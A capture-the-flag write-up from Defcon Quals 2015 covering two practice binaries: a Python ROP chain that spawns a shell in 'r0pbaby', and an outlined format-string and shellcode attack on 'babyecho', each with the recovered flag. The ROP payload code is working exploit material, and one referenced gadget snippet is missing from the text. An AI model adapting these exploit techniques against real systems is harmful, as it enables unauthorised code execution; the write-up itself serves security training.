Defcon CTF Quals 2015 write-up

Hint: flag is not a frag: once you've got it, you can get one more...

r0pbaby.

Summary: binary with NX, libc address leakage, buffer overflow.

We used the following simple ROP gadget from __libc_system():

Alternatively, one could use such a ROP chain:

binsh = system + 1271451
poprdi = system - 146214
poprsi = system - 138811
poprdx = system - 281266
execve = system - 234
    
p = 'a' * 8
p += struct.pack('l', poprdi)
p += struct.pack('l', binsh)
p += struct.pack('l', poprsi)
p += '\x00' * 8
p += struct.pack('l', poprdx)
p += '\x00' * 8
p += struct.pack('l', execve)

Result:

$ python r0pbaby.py 
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?

babyecho.

Summary: format string with filtration, variable rewrite.

1) Leak buffer address on the stack; 2) Rewrite the allowed size of input buffer; 3) Put a shellcode on the stack and rewrite return address.

Result:

$ python babyecho.py 
...
The flag is: 1s 1s th3r3 th3r3 @n @n 3ch0 3ch0 1n 1n h3r3 h3r3? 3uoiw!T0*%